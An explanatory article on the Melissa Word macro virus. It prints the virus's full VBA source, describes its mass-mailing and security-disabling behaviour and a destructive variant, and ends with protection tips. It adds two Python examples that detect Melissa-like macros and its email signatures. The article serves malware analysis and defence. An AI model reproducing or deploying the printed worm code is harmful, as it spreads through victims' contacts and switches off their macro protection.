
Melissa and other Macro Viruses Explained

Melissa, the deadliest Macro Virus ever to hit the net, is dreaded by people all over the world. I am going to shed some light on how it works, how to protect yourself from Macro Viruses, and lots more.

Let me start with a brief history of Melissa's origin. It is believed that Melissa first originated in Western Europe, on the alt.sex newsgroup. It took the web by storm and is quite deadly.

So How does it Work?

Melissa is a Word Macro Virus. That is, it was written in the Visual Basic Editor which comes along with Office97 or Office2K.

***************

NewBie Note: Run Word or Excel and press Alt + F11 to launch the Visual Basic
Editor.

***************

The core of Microsoft's Office suite is a Visual Basic Engine which runs behind
the scenes and can be used for advanced Visual
Basic coding.
So the following code was written in this Visual Basic editor.

/--------The Melissa Word Macro Virus Code: Start--------\

Private Sub Document_Open()


On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <>
""
Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") =
1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
Options.SaveNormalPrompt = (1 - 1)
End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice


Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by
Kwyjibo"
Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x=1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x=x+1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " &
Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't
show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If

Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)


Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If

If NTI1.Name <> "Melissa" Then


If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If

If DoNT <> True And DoAD <> True Then GoTo CYA

If DoNT = True Then


Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If

If DoAD = True Then


Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If

CYA:

If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") =


False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True
End If

'WORD/Melissa written by Kwyjibo


'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!

If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus


triple-word-score, plus fifty points for using all my
letters. Game's over. I'm outta here."
End Sub

\--------The Melissa Word Macro Virus Code: End--------/

Melissa infects Word97 and Word2000 documents. If you receive an email with an attached document that is infected with the Melissa Word Macro, your computer is not infected just by reading the email; Melissa is on your machine only if you open the infected attached Word Document. Once Melissa is on your machine, the macro virus will attempt to start Microsoft Outlook to send copies of the infected document, as an attachment, to 50 people in Outlook's Address Book. The message sent by this Macro Virus to 50 people from the address book is as follows:

The email Subject reads:

Important Message From [username]

Here the Username is the name that you have set as your Nickname, or the name which Outlook puts on all outgoing mail.

The Email Body reads:

Here is the document you asked for….don't show anyone else. ;-)

And this email has the infected document as an attachment. The infected document
reportedly contains some passwords to X rated
sites.

The Virus is restricted to MS Outlook and MS Exchange and does not trigger such mass mailings on other Mail Platforms like Lotus Notes. What's worse is that the Virus turns off Office's Macro Protection, leaving the user exposed to future Viruses. It also makes the Tools > Macro command inaccessible, preventing you from checking any Macro that may be present in a Document or a Template. It also switches off some of Office97 and Office2K's advanced features, like Macro Virus Protection, the prompt to SAVE NORMAL template, and the Confirm Conversion at Open. With these options disabled, MS Word 97 does not warn or prompt while saving the NORMAL.DOT or while opening a document with macros in it.

When a user opens or closes an infected document, the virus first checks whether it has done this mass e-mailing once before, by looking under the registry key "HKEY_CURRENT_USER\Software\Microsoft\Office\" for a value named "Melissa?". If that value is set to "... by Kwyjibo", then the mass e-mailing has been done previously from the current machine, and the virus will not attempt to do the mass mailing a second time. If the Virus does not find the registry value, it will carry out the Mass Mailings.

The Macro Virus will send out mass mailings only once from an infected machine, but its effects do not end there: it has a secondary consequence which triggers once every hour. Let me make it more clear.

When the minutes of the current time match the day of the month (for example, at 2.21 pm on May 21st), the Virus is triggered and pops the following phrase on the screen:

Twenty-two points, plus triple-word-score, plus fifty points for using all my
letters. Game's over. I'm outta here.

If a document is opened or saved at this particular time, the above text is inserted in the Document. Although this aspect of the Melissa Virus is harmless, it might be used in the future by some malicious Virus coder to write a deadlier Variant of Melissa.

If the Virus attacks via Word2000, it will modify the Registry setting such that the security level is set to the minimum and the Macro Security Feature is turned off.
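
The behaviours described above (a handler that runs on open, Outlook automation, switching off macro protection, copying code between the document and Normal.dot, and the registry marker) can be turned into a static check over macro source that has already been extracted from a document. This is an added example, not part of the original article; the rule names, the verdict levels and the sample macros are constructed for illustration.

```python
import re

# Rule names are labels chosen for this example; patterns come from the listing above.
RULES = {name: re.compile(rx, re.IGNORECASE) for name, rx in {
    "auto_exec": r"\bSub\s+Document_(Open|Close)\b",
    "outlook_automation": r'CreateObject\(\s*"Outlook\.Application"',
    "address_book_walk": r"\.AddressLists\b|\.AddressEntries\b",
    "security_tamper": r"Options\.(VirusProtection|SaveNormalPrompt|ConfirmConversions)"
                       r"|\\Word\\Security",
    "menu_tamper": r"CommandBars\(.+?\)\.Controls\(.+?\)\.Enabled\s*=\s*False",
    "self_replication": r"VBProject\.VBComponents|CodeModule\.(InsertLines|AddFromString)",
    "melissa_marker": r'Kwyjibo|"Melissa\?"',
}.items()}

def scan_macro(source):
    """Return {rule: [logical line numbers]} for each rule that matches."""
    logical = re.sub(r"[ \t]_\r?\n", " ", source)  # join VBA line continuations
    hits = {}
    for number, line in enumerate(logical.splitlines(), 1):
        for name, rx in RULES.items():
            if rx.search(line):
                hits.setdefault(name, []).append(number)
    return hits

def verdict(hits):
    found = set(hits)
    # Runs on open, drives Outlook and rewrites macro projects: a self-mailing macro.
    if {"auto_exec", "outlook_automation", "self_replication"} <= found:
        return "block"
    if "melissa_marker" in found:
        return "block"
    if found & {"security_tamper", "menu_tamper"}:
        return "quarantine"
    return "review" if found else "allow"

# Constructed samples (not real documents).
SUSPECT = '''Private Sub Document_Open()
Options.VirusProtection = (1 - 1)
Set o = CreateObject( _
"Outlook.Application")
Set c = NormalTemplate.VBProject.VBComponents.Item(1)
End Sub
'''
TAMPER_ONLY = "Sub Setup()\nOptions.VirusProtection = False\nEnd Sub\n"
BENIGN = "Sub FormatReport()\nSelection.Font.Bold = True\nEnd Sub\n"

if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT), ("tamper", TAMPER_ONLY), ("benign", BENIGN)):
        print(label, verdict(scan_macro(src)), scan_macro(src))
```
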

W97M.Melissa.IJ

If you have ever got an email with the subject 'Pictures', the line 'What's Up' in the body of the message and a Word document as an attachment, then it is likely that your computer is infected by the W97M.Melissa.IJ (Geni) Macro Virus. The virus tries to use Microsoft Outlook to email a copy of the infected document to up to 4 random addresses from the address book. It can also delete system files like io.sys and command.com, making it impossible to boot up your machine. Just for your info, the person who coded this virus was traced by the authorities with the help of AOL within a week of its first appearance. Later he was bailed out for $100,000.
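
Both messages described in this article (the original Melissa mail and the W97M.Melissa.IJ one) have a fixed subject, a fixed body line and a Word attachment, which is enough for a mail-gateway check. This is an added example, not part of the original article; the function names, the labels and the sample messages are constructed.

```python
import re
from email.message import EmailMessage

# Subject/body wording as quoted in the article; the dictionary keys are labels.
SIGNATURES = {
    "Melissa": (r"^Important Message From \S",
                r"document you asked for.*don.t show anyone else"),
    "W97M.Melissa.IJ": (r"^Pictures$", r"What.s Up"),
}
WORD_EXTENSIONS = (".doc", ".dot")

def has_word_attachment(msg):
    return any((part.get_filename() or "").lower().endswith(WORD_EXTENSIONS)
               for part in msg.iter_attachments())

def classify(msg):
    """Return the matching variant label, or None if the message does not match."""
    if not has_word_attachment(msg):  # both variants travel as a Word document
        return None
    subject = str(msg["Subject"] or "").strip()
    body_part = msg.get_body(preferencelist=("plain",))
    body = body_part.get_content() if body_part else ""
    for label, (subject_rx, body_rx) in SIGNATURES.items():
        if re.search(subject_rx, subject, re.I) and re.search(body_rx, body, re.I | re.S):
            return label
    return None

def build(subject, body, filename=None):
    """Construct a sample message; the attachment bytes are a harmless placeholder."""
    msg = EmailMessage()
    msg["Subject"] = subject
    msg.set_content(body)
    if filename:
        msg.add_attachment(b"constructed placeholder", maintype="application",
                           subtype="msword", filename=filename)
    return msg

if __name__ == "__main__":
    samples = [
        build("Important Message From Alice Example",
              "Here is that document you asked for ... don't show anyone else ;-)", "list.doc"),
        build("Pictures", "What's Up", "photo.doc"),
        build("Pictures", "Holiday photos attached", "album.doc"),
    ]
    for sample in samples:
        print(sample["Subject"], "->", classify(sample))
```
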

How do I protect myself from these Macro Viruses?

If you are already infected, then the best thing to do would be to update your Antiviral Software. If you are not already infected, then there are many ways to protect yourself from infection.

1. Change the attributes of the file Normal.dot to read-only. This method is foolproof, but it does not allow you to make modifications to this file if you want to.
2. The other thing you could do is password protect the Normal.dot file. This will ask you for a password every time you want to modify Normal.dot, thus allowing you to make changes to this file whenever you want to.
3. There is yet another way out. Since almost all Word97 Macro Viruses are Visual Basic Applications, or VBA code, you can protect yourself from them by locking them out. Start the Visual Basic Editor by pressing ALT + F11 and select Normal in the Project Explorer. Now select Normal Properties from the Tools menu. Next, choose the Protection tab in the Project Properties dialog box and enter a password in the password to view project properties option. This locks out the Macro viruses but still allows you to modify the Normal.dot file.
